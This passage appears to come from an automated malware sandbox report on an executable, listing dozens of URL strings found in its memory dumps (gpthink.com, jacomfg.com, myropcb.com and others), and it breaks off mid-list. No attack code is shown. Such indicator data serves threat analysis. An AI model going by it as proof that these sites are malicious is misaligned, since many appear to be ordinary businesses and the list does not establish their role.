                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000002.817464123.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702274857.00000000013DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/Q
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/c1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/%E9%98%B2%E7%88%86%E6%97%A0%E7%BA%BFAP.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/145.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/product.php?class2=7
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/product.php?class2=79
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/showproduct.php?id=25
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/showproduct.php?id=72
                  Source: PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.holleman.us/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.holleman.us/_0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.holleman.us/qqqqqqqqqqqqqqqq
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hummer.hu/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hummer.hu/Y
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iamdirt.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702274857.00000000013DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.item-pr.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.652259211.000000000143F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.item-pr.com/I
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652259211.000000000143F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.item-pr.com/t
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jacomfg.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jacomfg.com/C
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jacomfg.com/J
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jacomfg.com/a
                  Source: PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jacomfg.com/g
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jchysk.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.643743042.000000000771B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jchysk.com/0v
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jchysk.com/aH
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.804950474.000000000142A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.584136385.000000000137D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jenco.co.uk/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jenco.co.uk/JH
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jenco.co.uk/TH8
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jroy.net/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jroy.net/;
                  Source: PIyT9A3jfC.exe, 00000001.00000003.777680458.000000000776A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.688055469.0000000007692000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754767578.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.804950474.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ka-mo-me.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.754767578.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.804950474.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ka-mo-me.com/&
                  Source: PIyT9A3jfC.exe, 00000001.00000003.688055469.0000000007692000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ka-mo-me.com/As
                  Source: PIyT9A3jfC.exe, 00000001.00000003.777742716.0000000007697000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702274857.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.kernsafe.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.805219549.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.778285046.0000000007701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.koz1.net/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588156336.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586890411.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586479452.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.587455999.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.lagencefrancaise.com
                  Source: PIyT9A3jfC.exe, 00000001.00000003.676941396.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.lrsuk.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.lrsuk.com/J
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.lrsuk.com/g
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.lrsuk.com/i
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.maktraxx.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.maktraxx.com/;
                  Source: PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.medisa.info/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.medisa.info/T
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.medius.si/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.medius.si/cUm
                  Source: PIyT9A3jfC.exe, 00000001.00000003.652210236.0000000007698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mobilnic.net/H
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mqs.com.br/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702693462.0000000001445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mqs.com.br/A
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mqs.com.br/t
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.777742716.0000000007697000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/av
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/blog/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/comments/feed/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, 